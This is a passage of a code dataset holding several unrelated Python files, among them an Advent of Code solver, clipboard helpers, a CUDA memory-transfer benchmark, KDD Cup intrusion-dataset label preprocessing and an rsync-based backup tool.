_outcome = game_outcome(opponent, me)\n\n my_score = None\n if me == \"X\":\n my_score = 1\n elif me == \"Y\":\n my_score = 2\n elif me == \"Z\":\n my_score = 3\n else:\n raise ValueError(\"my score\")\n\n outcome = None\n if _outcome == \"win\":\n outcome = 6\n elif _outcome == \"draw\":\n outcome = 3\n elif _outcome == \"loss\":\n outcome = 0\n else:\n raise ValueError(\"outcome\")\n\n return my_score + outcome\n\n\nif __name__ == \"__main__\":\n games = load_stripped_lines(\"inputs/02_1\")\n\n game_scores = [score_game(x) for x in games]\n\n print(sum(game_scores))\n","repo_name":"mullevik/advent-of-code","sub_path":"2022/python/aoc_python/day_02.py","file_name":"day_02.py","file_ext":"py","file_size_in_byte":1786,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"23826261718","text":"import ctypes\nfrom enum import Enum\nfrom enum import EnumMeta\nfrom typing import Any\nfrom typing import List\nfrom typing import Optional\n\nfrom clipboard._c_interface import CF_HTML\nfrom clipboard._c_interface import CF_RTF\nfrom clipboard._c_interface import EnumClipboardFormats\nfrom clipboard._c_interface import GetClipboardFormatNameA\n\n\nclass ExtendedEnum(EnumMeta):\n def __contains__(cls, item: Any):\n return any(\n [\n item in cls.names, # type: ignore\n item in cls.values, # type: ignore\n item in ClipboardFormat.__members__.values(),\n ]\n )\n\n\nclass ClipboardFormat(Enum, metaclass=ExtendedEnum):\n CF_TEXT = 1\n CF_UNICODETEXT = 13\n CF_LOCALE = 16\n\n CF_HTML = CF_HTML\n CF_RTF = CF_RTF\n HTML_Format = 49418\n\n text = CF_UNICODETEXT # alias\n html = HTML_Format # alias\n HTML = html # alias\n rtf = CF_RTF # alias\n\n @classmethod # type: ignore\n @property\n def values(cls):\n return [i.value for i in cls]\n\n @classmethod # type: ignore\n @property\n def names(cls):\n return [i.name for i in cls]\n\n def __str__(self):\n return f\"{str(self.value)} {str(self.name)}\"\n\n def __eq__(self, other):\n if isinstance(self, type(other)):\n return self.name == other.name and self.value == other.value\n elif isinstance(other, int):\n return self.value == other\n else:\n return False\n\n\ndef get_clipboard_formats(formats: List[int] = None) -> List[int]:\n \"\"\"Return all available clipboard formats on clipboard.\n\n First format is the format on the clipboard, depending on your system.\n \"\"\"\n if formats is None:\n formats = [EnumClipboardFormats(0)]\n\n last_format: int = formats[-1]\n if last_format == 0:\n return formats[:-1]\n else:\n return formats + [EnumClipboardFormats(last_format)]\n\n\ndef get_format_name(format_code: int) -> Optional[str]:\n \"\"\"Get the name of the format by it's number.\n\n C function does not work for standard types (e.g. 
1 for CF_TEXT).\n So, this function will use ClipboardFormat for those in the standard.\n \"\"\"\n\n # Built-In\n if format_code in ClipboardFormat.values: # type: ignore\n return ClipboardFormat(format_code).name\n\n max_buffer_length: int = 100\n\n buffer: ctypes.Array[ctypes.c_char] = ctypes.create_string_buffer(\n b\" \" * 200\n )\n return_code: int = GetClipboardFormatNameA(\n format_code, ctypes.byref(buffer), max_buffer_length\n )\n\n # Failed\n if return_code == 0:\n return None\n\n format_name: str = buffer.value.decode()\n\n return format_name\n","repo_name":"AceofSpades5757/clip-util","sub_path":"src/clipboard/formats.py","file_name":"formats.py","file_ext":"py","file_size_in_byte":2684,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"31842961965","text":"import sys\nsys.setrecursionlimit(25000)\nn, parents = int(input()), [int(i) for i in input().split()]\na = [[] for i in range(n + 1)]\nfor i in range(n):\n a[parents[i]] += [i]\n\nroot=-1\ndef search_height(root):\n height = 0\n for child in a[root]:\n height = max(height,search_height(child)+1)\n return height\nprint(search_height(root))","repo_name":"scarlettnik/onedaycourse","sub_path":"DataStructures/1-2-2.py","file_name":"1-2-2.py","file_ext":"py","file_size_in_byte":345,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"40709223414","text":"\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport sys\n\nimport scipy.io as sio\n\nfrom fealpy.mesh.meshio import load_mat_mesh, write_mat_mesh, write_mat_linear_system\nfrom fealpy.mesh.simple_mesh_generator import rectangledomainmesh \nfrom fealpy.mesh.simple_mesh_generator import triangle, unitsquaredomainmesh\n\nfrom fealpy.functionspace.tools import function_space \nfrom fealpy.femmodel.BiharmonicFEMModel import BiharmonicRecoveryFEM \nfrom fealpy.boundarycondition.BoundaryCondition import DirichletBC\nfrom fealpy.solver import solve1\nfrom fealpy.functionspace.function import FiniteElementFunction\nfrom fealpy.erroranalysis.PrioriError import L2_error, div_error, H1_semi_error\nfrom fealpy.model.BiharmonicModel2d import SinSinData, BiharmonicData2, BiharmonicData3, BiharmonicData4, BiharmonicData5 \n\nm = int(sys.argv[1]) \nsigma = int(sys.argv[2]) \nmeshtype = int(sys.argv[3])\n\nif m == 1:\n model = SinSinData()\n box = [0, 1, 0, 1]\nelif m == 2:\n model = BiharmonicData2(1.0,1.0)\n box = [0, 1, 0, 1]\nelif m == 3:\n model = BiharmonicData3()\n box = [0, 1, 0, 1]\nelif m == 4:\n model = BiharmonicData4()\n box = [0, 1, 0, 1]\nelif m == 5:\n model = BiharmonicData5()\n box = [-1, 1, -1, 1]\n\nmaxit = 4\ndegree = 1\nerror = np.zeros((maxit,), dtype=np.float)\nderror = np.zeros((maxit,), dtype=np.float)\ngerror = np.zeros((maxit,), dtype=np.float)\nH1Serror = np.zeros((maxit,), dtype=np.float)\nNdof = np.zeros((maxit,), dtype=np.int)\n\n\nh0 = 0.025\ndata = sio.loadmat('solution.mat')\nfor i in range(maxit):\n mesh = triangle(box, h0/2**i)\n V = function_space(mesh, 'Lagrange', degree)\n V2 = function_space(mesh, 'Lagrange_2', degree)\n uh = FiniteElementFunction(V)\n ruh = FiniteElementFunction(V2)\n\n uh[:] = data['uh'+str(i)].reshape(-1)\n\n fem = BiharmonicRecoveryFEM(V, model, sigma=sigma, rtype='inv_area')\n fem.recover_grad(uh, ruh)\n\n Ndof[i] = V.number_of_global_dofs() \n error[i] = L2_error(model.solution, uh, order=4)\n derror[i] = div_error(model.laplace, ruh, order=4)\n gerror[i] = L2_error(model.gradient, ruh, order=5)\n H1Serror[i] 
= H1_semi_error(model.gradient, uh, order=5)\n\nprint(Ndof)\nprint('L2 error:\\n', error)\norder = np.log(error[0:-1]/error[1:])/np.log(2)\nprint('order:\\n', order)\n\nprint('div error:\\n', derror)\norder = np.log(derror[0:-1]/derror[1:])/np.log(2)\nprint('order:\\n', order)\n\nprint('revover gradient error:\\n', gerror)\norder = np.log(gerror[0:-1]/gerror[1:])/np.log(2)\nprint('order:\\n', order)\n\nprint('gradient error:\\n', H1Serror)\norder = np.log(H1Serror[0:-1]/H1Serror[1:])/np.log(2)\nprint('order:\\n', order)\n\n","repo_name":"weihuayi/fealpy","sub_path":"example/oldexample/oldexample/Matlab.py","file_name":"Matlab.py","file_ext":"py","file_size_in_byte":2609,"program_lang":"python","lang":"en","doc_type":"code","stars":209,"dataset":"github-code","pt":"37"} +{"seq_id":"8390888298","text":"import runner\nfrom runner.utils import _get_timestr\nimport os\nimport shutil\nimport sys\nimport argparse\n\ntry:\n from .utils import *\nexcept:\n from utils import *\n\n\nparser = argparse.ArgumentParser()\nparser.add_argument('--n_max_gpus', '-ng', type=int, default=2)\nparser.add_argument('--n_multiplex', '-nm', type=int, default=4)\nparser.add_argument('--seed_s', '-ss', type=int, default=0)\nparser.add_argument('--seed_e', '-se', type=int, default=20)\nparser.add_argument('-rmk', type=str, default='')\nparser.add_argument('-train', action='store_true', default=False)\n\nEXP = __import__(sys.argv[1])\nargs = EXP.add_args(parser).parse_args(sys.argv[2:])\n\nexp_dir_base = os.path.expanduser(f'~/run/liv')\nassert not os.system('df -h ' + exp_dir_base)\nlog_dir_base = os.path.join(exp_dir_base, f'{_get_timestr()}_{sys.argv[1]}_{args.rmk}')\n\nenv_pref = f'CUDA_DEVICE_ORDER=PCI_BUS_ID XLA_PYTHON_CLIENT_MEM_FRACTION={0.95/args.n_multiplex:.3f} OMP_NUM_THREADS=4 '\nroot_cmd = env_pref + EXP.base_cmd(args)\nhps = EXP.list_hps(args)\ntasks = [proc(a | {'__info': Info(root_cmd=root_cmd, log_dir_base=log_dir_base)}) for a in hps]\nprint('\\n'.join([t.cmd for t in tasks[-100:]]))\nprint(len(tasks))\nif not args.train:\n sys.exit(0)\n\nos.makedirs(log_dir_base, exist_ok=True)\nshutil.copyfile(__file__, os.path.join(log_dir_base, 'main.py'))\nshutil.copyfile(sys.argv[1] + '.py', os.path.join(log_dir_base, 'exp.py'))\nwith open(os.path.join(log_dir_base, 'exp.py'), 'a') as fout:\n print('#', ' '.join(sys.argv), file=fout)\nwith open(os.path.join(log_dir_base, 'NAME'), 'w') as fout:\n print(args.rmk, file=fout)\nr = runner.Runner(\n n_max_gpus=args.n_max_gpus, n_multiplex=args.n_multiplex, n_max_retry=-1)\nr.run_tasks(tasks)\nwith open(os.path.join(log_dir_base, 'COMPLETE'), 'w') as fout:\n fout.write('.')\n","repo_name":"meta-inf/fil","sub_path":"scripts/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1802,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"42035576342","text":"import os\nimport csv\nimport numpy as np\n\nR2L = ['ftp_write', 'guess_passwd', 'imap', 'multihop', 'named', 'phf', 'sendmail', 'snmpgetattack', 'snmpguess', 'spy',\n 'warezclient', 'warezmaster', 'xlock', 'xsnoop', 'httptunnel']\nDOS = ['back', 'land', 'mailbomb', 'neptune', 'pod', 'processtable', 'smurf', 'teardrop', 'udpstorm', 'apache2']\nProbe = ['ipsweep', 'mscan', 'nmap', 'portsweep', 'saint', 'satan']\nU2R = ['buffer_overflow', 'loadmodule', 'perl', 'ps', 'rootkit', 'sqlattack', 'xterm']\ndef get_data(source,target):\n data_file = open(target, 'w', newline='')\n with open(source,'r') as data_source:\n csv_reader=csv.reader(data_source)\n 
csv_writer=csv.writer(data_file)\n        for row in csv_reader:\n            temp_line=row # store each row in the temp_line list\n            temp_line[41]=temp_line[41].strip('.')\n            if temp_line[41] in R2L:\n                temp_line[41]=1\n            elif temp_line[41] in DOS:\n                temp_line[41]=2\n            elif temp_line[41] in Probe:\n                temp_line[41]=3\n            elif temp_line[41] in U2R:\n                temp_line[41]=4\n            elif temp_line[41] =='normal':\n                temp_line[41] =0\n            csv_writer.writerow(temp_line)\n    # write out each row with its relabeled attack category\n    data_file.close()\ndef readData(path):\n    data=[]\n    with open(path,'r') as data_source:\n        csv_reader=csv.reader(data_source)\n        for row in csv_reader:\n            temp_line=row\n            data.append(temp_line)\n    return data\ndef four_data(source,target):\n    data_file = open(target, 'w')\n    csv_writer = csv.writer(data_file)\n    # data_file = open(target, 'w')\n    with open(source, 'r') as f:\n        ff = f.read()\n    item=ff.split(',')\n    for i in range(len(item)):\n        if item[i] in R2L:\n            item[i] = 1\n        elif item[i] in DOS:\n            item[i] = 2\n        elif item[i] in Probe:\n            item[i] = 3\n        elif item[i] in U2R:\n            print(item[i])\n            item[i] = 4\n            print(i)\n        elif item[i] == 'normal':\n            item[i] = 0\n    csv_writer.writerow(item)\n    # write out the row with its relabeled attack categories\n    data_file.close()\nif __name__ == '__main__':\n    # path='./data/KDDTrain.txt'\n    # path1='./data/train1.txt'\n    # get_data(path,path1)\n    get_data('./data/kddcup991.txt','./data/kddcup.txt')","repo_name":"wangyingying625/FL-detection","sub_path":"bak/txtHandle.py","file_name":"txtHandle.py","file_ext":"py","file_size_in_byte":2469,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"37"}
{"seq_id":"35200364351","text":"from hashlib import md5\nfrom io import BytesIO\nimport torch\nimport time\nimport numpy as np\n\n\nclass LinearSchedule(object):\n    def __init__(self, eps_begin, eps_end, nsteps):\n        self.epsilon = eps_begin\n        self.eps_begin = eps_begin\n        self.eps_end = eps_end\n        self.nsteps = nsteps\n\n    def update(self, t):\n        self.epsilon = np.interp(t, [0, self.nsteps], [self.eps_begin, self.eps_end])\n\n\ndef np2torch(x, device, cast_double_to_float=True):\n    \"\"\"\n    Utility function that accepts a numpy array and does the following:\n    1. Convert to torch tensor\n    2. Move it to the GPU (if CUDA is available)\n    3. 
Optionally casts float64 to float32 (torch is picky about types)\n \"\"\"\n x = torch.from_numpy(x).to(device)\n if cast_double_to_float and x.dtype is torch.float64:\n x = x.float()\n return x\n\n\ndef check_network_identical(network1, network2):\n \"\"\"Check if two networks are identical.\n\n Args:\n network1 (torch.nn.Module): The first network.\n network2 (torch.nn.Module): The second network.\n\n Returns:\n bool: True if the two networks are identical, False otherwise.\n\n \"\"\"\n buffer = BytesIO()\n torch.save(network1.state_dict(), buffer)\n md5_1 = md5(buffer.getbuffer()).hexdigest()\n\n buffer = BytesIO()\n torch.save(network2.state_dict(), buffer)\n md5_2 = md5(buffer.getbuffer()).hexdigest()\n\n return md5_1 == md5_2\n\n\ndef check_network_weights_loaded(network, weights_file):\n \"\"\"Check if the network is identical to the weights file.\n\n Args:\n network (torch.nn.Module): The network.\n weights_file (str): The path to the weights file.\n\n Returns:\n bool: True if the network is identical to the weights file, False\n otherwise.\n\n \"\"\"\n buffer = BytesIO()\n torch.save(network.state_dict(), buffer)\n md5_1 = md5(buffer.getbuffer()).hexdigest()\n\n with open(weights_file, \"rb\") as f:\n b = f.read() # read file as bytes\n md5_2 = md5(b).hexdigest()\n return md5_1, md5_2\n\n\nimport time\nimport datetime\n\n_last_tick = None\n_avg_epoch_time = 0.00001\n# invoke at the beginning of each epoch\ndef estimate_training_time(i_episode, total_episode):\n global _last_tick, _avg_epoch_time\n\n if not _last_tick: # i_episode == 0\n _last_tick = time.time()\n return \"estimating...\"\n\n # i_episode >=1\n now = time.time()\n dt = now - _last_tick\n _last_tick = now\n\n _avg_epoch_time += (dt - _avg_epoch_time) / i_episode\n\n remaing_training_time = int((total_episode - i_episode) * _avg_epoch_time)\n return str(datetime.timedelta(seconds=remaing_training_time))\n","repo_name":"mebusy/dqn_test","sub_path":"lqn_tutor/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":2652,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"28894345303","text":"import pytest\nfrom .ising import ising_1d\n\n\n# Have number of qubits large enough to have size number of unique Pauli ops.\ndef test_ising_no_neigh():\n ham = ising_1d(1, 1.0, 1.0)\n expected = {\"x\": 1.0}\n assert ham == expected\n\n\ndef test_ising_one_neigh():\n ham = ising_1d(2, energy_prefactor=1.0, external_field=2.0, normalize=True)\n expected = {\"xi\": 2.0, \"ix\": 2.0, \"zz\": 1.0}\n expected = {p: v / sum(expected.values()) for p, v in expected.items()}\n\n assert ham == expected\n\n\ndef test_ising_two_neigh():\n ham = ising_1d(3, energy_prefactor=1.0, external_field=2.0, normalize=True)\n expected = {\n \"xii\": 2.0,\n \"ixi\": 2.0,\n \"iix\": 2.0,\n \"zzi\": 1.0,\n \"izz\": 1.0,\n }\n expected = {p: v / sum(expected.values()) for p, v in expected.items()}\n\n assert ham == expected\n","repo_name":"Simultonian/hamilutor-qiskit","sub_path":"src/hamiltonian/physics/test_ising_ham.py","file_name":"test_ising_ham.py","file_ext":"py","file_size_in_byte":834,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"29143318252","text":"from django.db import models\nfrom django.core.exceptions import ObjectDoesNotExist\n\n\nclass OrderField(models.PositiveIntegerField):\n def __init__(self, for_fields=None, *args, **kwargs):\n self.for_fields = for_fields\n super(OrderField, self).__init__(*args, 
**kwargs)\n\n    def pre_save(self, model_instance, add):\n        if getattr(model_instance, self.attname) is None:\n            # The value is empty.\n            try:\n                qs = self.model.objects.all()\n                if self.for_fields:\n                    # Filter objects whose fields listed in\n                    # \"for_fields\" have the same values.\n                    query = {field: getattr(model_instance, field) for field in self.for_fields}\n                    qs = qs.filter(**query)\n                # Get the order of the last object.\n                last_item = qs.latest(self.attname)\n                value = last_item.order + 1\n            except ObjectDoesNotExist:\n                value = 0\n            setattr(model_instance, self.attname, value)\n            return value\n        else:\n            return super(OrderField, self).pre_save(model_instance, add)\n# This is the OrderField field class. It inherits from PositiveIntegerField, which is defined in Django. The constructor\n# accepts an optional for_fields parameter that specifies the parent object's fields relative to which\n# the order is calculated.\n# We override the pre_save() method of the PositiveIntegerField class. It runs before Django saves the field\n# to the database. In this method we do the following:\n# 1) check whether such a value already exists for the model's objects. To get the name under which the field was\n# defined on the model, we use the self.attname attribute. If the field value is None, we work out what it should\n# be equal to:\n# - build a QuerySet to fetch all objects of the model. The model class\n# the current field is defined on is available via\n# self.model;\n# - if the for_fields parameter was given, take the current object's values for those fields and filter the QuerySet by them.\n# This way we only get the objects that belong to the same parent, for example all modules of one course;\n# - get the object with the highest order number from the filtered result via\n# last_item = qs.latest(self.attname). If no object is found, assign the current one order number 0;\n# - if an object is found, give the current one a number greater by one;\n# 2) if the field was filled in by the user, do nothing.\n# !IMPORTANT! When you create custom model fields, try to make them generic. Avoid hard-coding\n# data or model fields they may depend on. Fields should be applicable to any model, not just one.\n\n\n\n\n","repo_name":"KonstantinovD/educa","sub_path":"courses/fields.py","file_name":"fields.py","file_ext":"py","file_size_in_byte":4103,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
{"seq_id":"23607389872","text":"import tkinter as tk\r\nfrom tkinter import *\r\n\r\nfirst = tk.Tk()\r\nfirst.title(\"Serial Position Effect\")\r\n\r\nbase = tk.Canvas(first,bg='light cyan', width = 800, height = 400)\r\nbase.pack()\r\n\r\nhead = tk.Label(first, text='Instructions')\r\nhead.config(font=('Times', 30),bg='light cyan')\r\nbase.create_window(400, 70, window=head)\r\n\r\nin1 = tk.Label(first, text='1. Once you click the get started button, a window appears displaying a list of 10 animals.')\r\nin1.config(font=('Times', 15),bg='light cyan')\r\nbase.create_window(400, 150, window=in1)\r\n\r\nin2 = tk.Label(first, text='2. It appears only for 10 seconds. Try to memorize the animals displayed in the list.')\r\nin2.config(font=('Times', 15),bg='light cyan')\r\nbase.create_window(374, 200, window=in2)\r\n\r\nin3 = tk.Label(first, text='3. 
After completion of 10 seconds, another window appears which contains 18 animals.')\r\nin3.config(font=('Times', 15),bg='light cyan')\r\nbase.create_window(393, 250, window=in3)\r\n\r\nin4 = tk.Label(first, text='4. Select the previously memorized animals and click on the button below.')\r\nin4.config(font=('Times', 15),bg='light cyan')\r\nbase.create_window(340, 300, window=in4)\r\n\r\ndef click_me():\r\n    first.destroy()\r\n    import main\r\n\r\nz = Button(first, text=\"Get Started\", command=click_me)\r\nz.config(font=('georgia', 15),fg='white smoke',bg='black')\r\nz.pack(padx=15, pady=15)\r\nfirst.mainloop()","repo_name":"KrishnaPoojithaV/Serial-Position-Effect-HCI","sub_path":"first.py","file_name":"first.py","file_ext":"py","file_size_in_byte":1371,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
{"seq_id":"2670945021","text":"import pycuda.driver as cuda\nfrom pycuda.tools import PageLockedMemoryPool\nimport numpy as np\nimport time\nimport ctypes\nimport pdb\nfrom queue import Queue\nfrom threading import Thread\nfrom pycuda.tools import make_default_context\nimport matplotlib.pyplot as plt\n\nimport threading\n# Initialize CUDA\ncuda.init()\n\nglobal ctx\nctx = make_default_context() # will initialize the first device it finds\ndev = ctx.get_device()\n\ndef _finish_up():\n    global ctx\n    ctx.pop()\n    ctx = None\n\n    from pycuda.tools import clear_context_caches\n    clear_context_caches()\n\nimport atexit\natexit.register(_finish_up)\n\nnum_elems = [5000000, 10000000, 20000000, 30000000, 40000000]\n\n# prints pci_bus_id, device name and device id for installed GPUs. You can run the Linux lspci command on the bus_id to\n# obtain information about the number of PCIe lanes on that bus. This will give you the expected bandwidth\ndef print_device_info():\n    driver_ver = cuda.get_version()\n    print(\"CUDA Driver Version: {0}.{1}.{2}\".format(driver_ver[0], driver_ver[1], driver_ver[2]))\n    num_cuda_devices = cuda.Device.count()\n    for i in range(0, num_cuda_devices):\n        dev = cuda.Device(i)\n        pci_bus_id = dev.pci_bus_id()\n        dev_name = dev.name()\n        print(\"device id: {0}, device name: {1}, bus_id: {2}\".format(i, dev_name, pci_bus_id))\n\n# Helper function to copy src array to destination using ctypes memmove\ndef copy_np_to_pinned_memory(src, dest):\n    src_ = src.ctypes.data_as(ctypes.POINTER(ctypes.c_float))\n    dest_ = dest.ctypes.data_as(ctypes.POINTER(ctypes.c_float))\n    sz = src.size * ctypes.sizeof(ctypes.c_float)\n    ctypes.memmove(dest_, src_, sz)\n\n# This function measures the time taken to transfer data from host-to-device (h2d) when:\n# 1. source is in unpinned (pageable) memory\n# 2. source is in pinned memory. In this case, we also measure time taken to transfer data\n# from unpinned to pinned memory.\n# Times are measured for different data sizes and plotted. 
Data transfer bandwidth is also calculated from\n# the transfer times.\ndef compare_performance():\n # a quick warm up..\n n = 25000000\n a = np.random.randn(n).astype(np.float32)\n # allocate space on GPU\n mem_gpu = cuda.mem_alloc(a.nbytes)\n cuda.memcpy_htod(mem_gpu, a)\n # free space on GPU\n mem_gpu.free()\n h2d_nopin = []\n h2d_nopin_bw = []\n # measure timing without pinning\n for n in num_elems:\n # the data to be transferred\n a = np.random.randn(n).astype(np.float32)\n # allocate space on GPU\n mem_gpu = cuda.mem_alloc(a.nbytes)\n # only measure h2d transfer time\n start = time.perf_counter()\n cuda.memcpy_htod(mem_gpu, a)\n te = time.perf_counter() - start #te: time elapsed\n h2d_nopin.append(te)\n h2d_nopin_bw.append(a.nbytes/(10**9 * (te))) # convert to a bandwidth\n # free space on GPU\n mem_gpu.free()\n # now do pinning and measure time to pin and time to transfer\n h2h_pinned = [] # records the transfer time from unpinned -> pinned memory\n h2d_pin = [] # records the host to device transfer time with data in pinned memory.\n h2d_pin_total = [] # records the total (sum of the previous two)\n h2d_pin_bw = [] #h2d_pin, converted to a bandwidth (GB/sec)\n for i, n in enumerate(num_elems):\n a = np.random.randn(n).astype(np.float32)\n # allocate space on GPU\n mem_gpu = cuda.mem_alloc(a.nbytes)\n # allocate page locked memory\n a_pin = cuda.register_host_memory(a)\n # copy data from np array to pinned memory and measure transfer time\n start = time.perf_counter()\n copy_np_to_pinned_memory(a, a_pin)\n te = time.perf_counter() - start # te: time elapsed\n h2h_pinned.append(te)\n # measure h2d transfer time\n start = time.perf_counter()\n cuda.memcpy_htod(mem_gpu, a_pin)\n te = time.perf_counter() - start #te: time elapsed\n h2d_pin.append(te)\n h2d_pin_bw.append(a.nbytes / (10**9 * te))\n h2d_pin_total.append(h2d_pin[i] + h2h_pinned[i])\n # free allocated pinned memory\n a_pin.base.unregister()\n # free space on GPU\n mem_gpu.free()\n\n fig = plt.figure()\n num_elems_mb = [x*4/10**6 for x in num_elems]\n\n plt.plot(num_elems_mb, h2d_nopin, 'g', label='h2d transfer_time (no pinning)')\n plt.plot(num_elems_mb, h2d_pin, 'r', label='h2d transfer_time (with pinning)')\n plt.plot(num_elems_mb, h2h_pinned, 'b', label='h2h transfer_time')\n plt.plot(num_elems_mb, h2d_pin_total, 'k', label='h2d transfer_time (with pinning, total)')\n plt.legend()\n plt.xlabel('data size (MB)')\n plt.ylabel('time (sec)')\n plt.show()\n\n\nif __name__ == '__main__':\n print_device_info()\n compare_performance()","repo_name":"AbnerVictor/CUDA_PCIE_benchmarking","sub_path":"cuda_memcpy_test.py","file_name":"cuda_memcpy_test.py","file_ext":"py","file_size_in_byte":4764,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"686959570","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\n\"\"\"DOCSTRING goes here\n\"\"\"\n\n\nimport os\nimport sys\nimport time\nimport configparser\nimport pickle\nimport subprocess\nimport logging\n\n\n__author__ = \"Bulak Arpat\"\n__copyright__ = \"Copyright 2017-2018, Bulak Arpat\"\n__license__ = \"GPLv3\"\n__version__ = \"0.0.2\"\n__maintainer__ = \"Bulak Arpat\"\n__email__ = \"Bulak.Arpat@unil.ch\"\n__status__ = \"Development\"\n\n\nAPP_PATH = os.path.join(os.path.expanduser(\"~\"), \".backupy\")\nSUCCESS, INCOMPLETE, FAILED = 0, 1, 2\n\n\nclass Cache(object):\n def __init__(self, cache_file, default_data=None):\n if default_data is None:\n default_data = {}\n try:\n self.cache_file = open(cache_file, 'rb+')\n 
except IOError:\n self.cache_file = open(cache_file, 'wb+')\n try:\n self._cache = pickle.load(self.cache_file)\n except (pickle.UnpicklingError, EOFError):\n self._cache = default_data\n\n def register(self):\n self.cache_file.seek(0)\n pickle.dump(self._cache, self.cache_file)\n self.cache_file.truncate()\n\n def update(self, *args, **kwargs):\n for arg in args:\n if isinstance(arg, dict):\n kwargs.update(arg)\n elif isinstance(arg, str):\n kwargs[arg] = True\n else:\n raise Exception(\"Can't accept {} as key\".format(arg))\n for key, item in kwargs.items():\n self._cache[key] = item\n self.register()\n\n def has_var(self, var_name):\n return var_name in self._cache\n\n def var_list(self):\n return list(self._cache.keys())\n\n def get(self, var_name):\n return self._cache[var_name]\n\n def __repr__(self):\n return repr(self._cache)\n\n\ndef _get_rysnc_command(source, destination, options):\n rcommand = \"rsync\"\n for opt, opt_val in options.items():\n if opt_val:\n rcommand += ' {}=\"{}\"'.format(opt, opt_val)\n else:\n rcommand += ' {}'.format(opt)\n rcommand += \" {} {}\".format(source, destination)\n return rcommand\n\n\nclass BackupyApp(object):\n\n def __init__(self, app_path):\n self._app_path = app_path\n self._log_file = os.path.join(app_path, \"backupy.log\")\n self._config_file = os.path.join(app_path, \"backupy.conf\")\n self._cache_file = os.path.join(app_path, \".backupy.cache\")\n logging.basicConfig(\n filename=self._log_file, level=logging.DEBUG,\n format='%(levelname)s [%(asctime)s] %(message)s',\n datefmt='%m/%d/%Y %H:%M:%S')\n self.logger = logging.getLogger('backupy')\n self._config = self._set_config(default_config={})\n self.cache = Cache(self._cache_file,\n default_data={'last_state': None,\n 'last_source': None})\n self.logger.info('Initilizing...')\n self.logger.debug('Cache info: {}'.format(self.cache))\n if sys.version_info.minor < 5:\n self._process = self._process_3_4\n else:\n self._process = self._process_3_5\n\n @property\n def app_path():\n return self._app_path\n\n def _set_config(self, default_config):\n config = configparser.ConfigParser(allow_no_value=True)\n config.optionxform = str\n config.read_dict(default_config)\n try:\n config.read(self._config_file)\n except Exception as err:\n print(err)\n return config\n\n def get_config(self, section, option=None):\n conf_section = self._config[section]\n if option is None:\n return conf_section\n else:\n return conf_section.get(option)\n\n def _get_source_order(self):\n source_order = list(self.get_config('sources'))\n last_source = self.cache.get('last_source')\n if last_source in source_order:\n last_index = source_order.index(last_source)\n last_state = self.cache.get('last_state')\n if last_state == SUCCESS:\n pivot_index = last_index + 1\n else:\n pivot_index = last_index\n else:\n pivot_index = 0\n source_order = source_order[pivot_index:] + source_order[:pivot_index]\n return source_order\n\n def _process_3_4(self, r_command):\n try:\n r_process = subprocess.check_output(args=r_command, shell=True,\n stderr=subprocess.STDOUT)\n except subprocess.CalledProcessError as err:\n self.cache.update(last_state=FAILED)\n self.logger.error(\n 'rsync returned non-zero exit code: {}'.format(\n err.returncode))\n for line in err.output.splitlines():\n self.logger.error(\n '[rsync] %s', line.decode(\"utf-8\"))\n else:\n self.cache.update(last_state=SUCCESS)\n self.logger.info('backup successfully completed:')\n for line in r_process.splitlines():\n self.logger.info('[rsync] %s', line.decode(\"utf-8\"))\n def 
_process_3_5(self, r_command):\n r_process = subprocess.run(args=r_command, shell=True,\n stdout=subprocess.PIPE,\n stderr=subprocess.PIPE)\n if not r_process.returncode == 0:\n self.cache.update(last_state=FAILED)\n self.logger.error(\n 'rsync returned non-zero exit code: {}'.format(\n r_process.returncode))\n for line in r_process.stderr.splitlines():\n self.logger.error(\n '[rsync] %s', line.decode(\"utf-8\"))\n else:\n self.cache.update(last_state=SUCCESS)\n self.logger.info('backup successfully completed:')\n for line in r_process.stdout.splitlines():\n self.logger.info('[rsync] %s', line.decode(\"utf-8\"))\n def backup_loop(self):\n source_order = self._get_source_order()\n sources = self.get_config('sources')\n time_limit = float(self.get_config('backup', 'time_limit'))\n finish_time = time.time() + time_limit * 3600\n for source in source_order:\n if time.time() > finish_time:\n self.logger.info('backup halted due to timelimit')\n break\n destination = os.path.join(\n self.get_config('backup', 'destination'), sources[source])\n self.logger.info(\n 'Starting backup {} --> {}'.format(source, destination))\n self.cache.update(last_source=source, last_state=INCOMPLETE)\n r_command = _get_rysnc_command(source=source,\n destination=destination,\n options=self.get_config('rsync'))\n self._process(r_command)\n\n\ndef main():\n app = BackupyApp(app_path=APP_PATH)\n app.backup_loop()\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"bulak/backupy","sub_path":"backupy.py","file_name":"backupy.py","file_ext":"py","file_size_in_byte":6983,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"31717002652","text":"FRAME_STYLE = {\"bg\": \"black\"}\r\nLABEL_STYLE = {\"bg\": \"black\",\r\n \"fg\": \"white\",\r\n \"text\": \"Currency exchange rates calculation\".upper(),\r\n \"font\": (\"Calibri\", 15, \"bold\")}\r\nBUTTON_WIDTH = 20\r\nBUTTON_HEIGTH = 2\r\nBUTTON_STYLE = {\"width\": BUTTON_WIDTH,\r\n \"height\": BUTTON_HEIGTH,\r\n \"relief\": \"groove\",\r\n \"borderwidth\": 1,\r\n \"bg\": \"lightgrey\",\r\n \"font\": (\"Calibri\", 12, \"bold\")}\r\n\r\nBASE_URL = f\"https://free.currconv.com/api/v7/\"\r\n\r\n# read file containing the api 